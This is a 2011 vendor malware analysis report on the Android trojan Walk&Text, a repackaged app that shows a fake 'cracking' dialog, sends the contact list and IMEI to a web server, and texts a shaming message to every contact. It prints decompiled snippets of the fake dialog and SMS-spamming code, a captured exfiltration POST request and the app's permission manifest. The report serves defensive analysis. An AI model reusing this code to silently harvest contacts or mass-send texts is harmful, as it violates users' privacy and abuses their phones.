Malware Analysis Report - Kindsight

tibburfrogtownMobile - Wireless

Dec 14, 2013 (3 years and 7 months ago)

63 views





Malware Analysis Report

Trojan:AndroidOS/Walk&Text

September

2011


Kevin McNamee

Kevin@kindsight.net

www.kindsight.net

Malware Analysis
-

Trojan:AndroidOS/
Walk&Text



www.kindsight.net


Copyright © 2011
Kindsight, Inc.


2

Analysis
Summary



Name:
Trojan:AndroidOS/
Walk&Text

MD5:

c3a0f5d584cc2c3221bbd79486578208

Size:
2247671 bytes

Source:

Indusface

File Type:
Android Application

Application:

com.incorporateapps.walktext

Version:

1.3.7


Sample Collected:
2011
-
08
-
02



Description:

Th
is
malware comes packaged as the Walk & Text application,
however the application contains no code to
support any Walk&Text functionality. It pops up some scary dialog boxes, sends your contact list as a POST
to
http://incorporateapps.com/wat.php
and sends SMS messages to
everyone on
your contact list saying:



Hey,just downlaoded a pirated App off the Internet, Walk and Text for Android. Im stupid and cheap,it costed
only 1 buck.

Don't steal like I did!”


It’s not clear whether the message or the spelling is more embarrassing.
Incorporate Apps have denied any
association with the
malware, although the contact list is sent to their web site.



Infection:

The phone is infected by installing the infected application. Most Android anti
-
virus applications detect this
infection and warn you during the installation
process.

Threat:

Medium

This malware does not appear to do any major damage but it does:


1.

Send your contact list to a third part web server.

2.

Send SMS messages to your contact list.


The message is somewhat embarrassing, but harmless.
It is not clear what
the
contact list
is used for.

Remediation:

The threat can be removed manually by uninstalling the application. Most Android anti
-
virus applications will
detect and remove this malware
as well
.

.


Malware Analysis
-

Trojan:AndroidOS/
Walk&Text



www.kindsight.net


Copyright © 2011
Kindsight, Inc.


3

Detailed Analysis

The malware c
omes packaged as the Walk & Text application, however the application contains no code to
support any Walk&Text functionality. It pops up some scary dialog boxes, sends your contact list as a POST
to
http://
incorporateapps.com/wat.php
and sends SMS messages to your contact list warning about the evils
of pirating software.




When executed it first displays a dialog indicating that it is somehow “cracking” the phone.


protected void onCreate(Bundle para
mBundle)

{

super.onCreate(paramBundle);

int i = Log.e("test", "test");

this.a = this;

ProgressDialog localProgressDialog = ProgressDialog.show(this, "Processing", "Cracking...", 1, 0);

this.b = localProgressDialog;

e
locale = new e(this);

this.c = locale;

this.c.start();

}


Malware Analysis
-

Trojan:AndroidOS/
Walk&Text



www.kindsight.net


Copyright © 2011
Kindsight, Inc.


4


The dialog is shown below:




This is likely a ruse, because there does not appear to be any “cracking” done what
-
so
-
ever.


A few seconds later it completes its operation with the follo
wing dialog box:




Malware Analysis
-

Trojan:AndroidOS/
Walk&Text



www.kindsight.net


Copyright © 2011
Kindsight, Inc.


5


In the meantime it has sent your contact list as a post to
http://incorporateapps.com/wat.php


POST /wat.php HTTP/1.1

Content
-
Length: 66

Content
-
Type: application/x
-
www
-
form
-
urlencoded

Host: incorporateapps.com

Connection: Keep
-
Alive

User
-
Agent: Apache
-
HttpClient/UNAVAILABLE (java 1.4)

Expect: 100
-
Continue

HTTP/1.1 100 Continue

SECOND_TABLE=1&phoneNumber=5556&imei=000000000000000&name=Jane+Doe

HTTP/1.1 200 OK


When you visit the site you get the following disclaimer:


Hello,

If you found your way to this page from some articles on the Internet explaining that this website collects
private user information you are on the right place.

With the smallest detail tha
t this php file was created on 22.03.2011 and we have logs to prove it!


We have added this page right after we found out about the article, this file was non
-
existent prior to this
article as we were not aware that someone is trying to do bad publicity o
n our application!


We are looking into ways of filing a lawsuit against AVAST from CZECH REPUBLIC, company which has a
vast interest in spreading fear in favor of their products! We are denied contact to any officials from that
company and our calls are b
eing blocked or ignored! We were never contacted by this company to this day,
although our contact details are easily accessible to anyone and we have thousands of support tickets from
our apps! Nobody from this Company ever bought any of our official appl
ications prior to the article being
published and they are using illegal software found on the internet we have no control over to base their
materials on, way to go!

One can easily see that the signature on the cracked file is not our official signature
and it is clearly that
someone repackaged our file and spreads it on these torrents/fileservers.


Malware Analysis
-

Trojan:AndroidOS/
Walk&Text



www.kindsight.net


Copyright © 2011
Kindsight, Inc.


6


There also appears to be code to send SMS messages to people on the contact list.


public final void run()

{

try

{

LicenseCheck localLicenseC
heck = this.b;

String str1 = this.a;

int i = Log.e("send sms", str1);

Context localContext1 = localLicenseCheck.a;

Intent localIntent1 = new Intent("SMS_SENT");

PendingIntent localPendingIntent1 = PendingIntent.getBroadcast(lo
calContext1, 0, localIntent1, 0);

Context localContext2 = localLicenseCheck.a;

Intent localIntent2 = new Intent("SMS_DELIVERED");

PendingIntent localPendingIntent2 = PendingIntent.getBroadcast(localContext2, 0, localIntent2, 0);

Context localContext3 = localLicenseCheck.a;

d locald = new d(localLicenseCheck);

IntentFilter localIntentFilter = new IntentFilter("SMS_DELIVERED");

Intent localIntent3 = localContext3.registerReceiver(locald, localIntentFilter);


SmsManager localSmsManager = SmsManager.getDefault();

if ((str1 != null) && (str1.length() > 0) && (" Hey,just downlaoded a pirated App off the Internet, Walk and
Text for Android. Im stupid and cheap,it costed only 1 buck.Don't steal like I did
!".length() > 0))

localSmsManager.sendTextMessage(str1, null, " Hey,just downlaoded a pirated App off the Internet,
Walk and Text for Android. Im stupid and cheap,it costed only 1 buck.Don't steal like I did!",
localPendingIntent1, localPendingInte
nt2);

boolean bool = LicenseCheck.a(this.b).sendEmptyMessage(0);

return;

}


These messages were not observed in the test case, but that could have been due to a configuration issue
with the emulated phone.

Conclusion

This malware does not
appear to do any major damage but it does:


3.

Send your contact list to a third part web server.

4.

Send SMS messages to your contact list.


It is not clear what the contact list is used for.
Malware Analysis
-

Trojan:AndroidOS/
Walk&Text



www.kindsight.net


Copyright © 2011
Kindsight, Inc.


7


Appendix

XML Manifest

<?xml version="1.0" encoding="utf
-
8"?>

<
manifest android:versionCode="12" android:versionName="1.3.7"
package="com.incorporateapps.walktext"

xmlns:android="http://schemas.android.com/apk/res/android">

<application android:label="@string/app_name" android:icon="@drawable/icon">

<act
ivity android:theme="@android:style/Theme.NoTitleBar.Fullscreen"
android:name=".LicenseCheck" android:screenOrientation="landscape"
android:noHistory="true">

<intent
-
filter>

<action android:name="android.intent.action.MAIN" />


<category android:name="android.intent.category.LAUNCHER" />

</intent
-
filter>

</activity>

<activity android:theme="@android:style/Theme.NoTitleBar.Fullscreen"
android:name=".WalkText" android:screenOrientation="la
ndscape" />

</application>

<uses
-
permission android:name="android.permission.CAMERA" />

<uses
-
feature android:name="android.hardware.camera" />

<uses
-
feature android:name="android.hardware.camera.autofocus" />

<uses
-
permission android:n
ame="com.android.vending.CHECK_LICENSE" />

<uses
-
permission android:name="android.permission.ACCESS_FINE_LOCATION" />

<uses
-
permission android:name="android.permission.ACCESS_COARSE_LOCATION" />

<uses
-
permission android:name="android.permission
.INTERNET" />

<uses
-
permission android:name="android.permission.ACCESS_NETWORK_STATE" />

<uses
-
permission android:name="android.permission.VIBRATE" />

<uses
-
permission android:name="android.permission.SEND_SMS" />

<uses
-
permission android
:name="android.permission.READ_CONTACTS" />

<uses
-
permission android:name="android.permission.READ_PHONE_STATE" />

<uses
-
permission android:name="android.permission.MODIFY_PHONE_STATE" />

<uses
-
permission android:name="android.permission.CALL_P
HONE" />

<uses
-
permission android:name="android.permission.READ_LOGS" />

</manifest>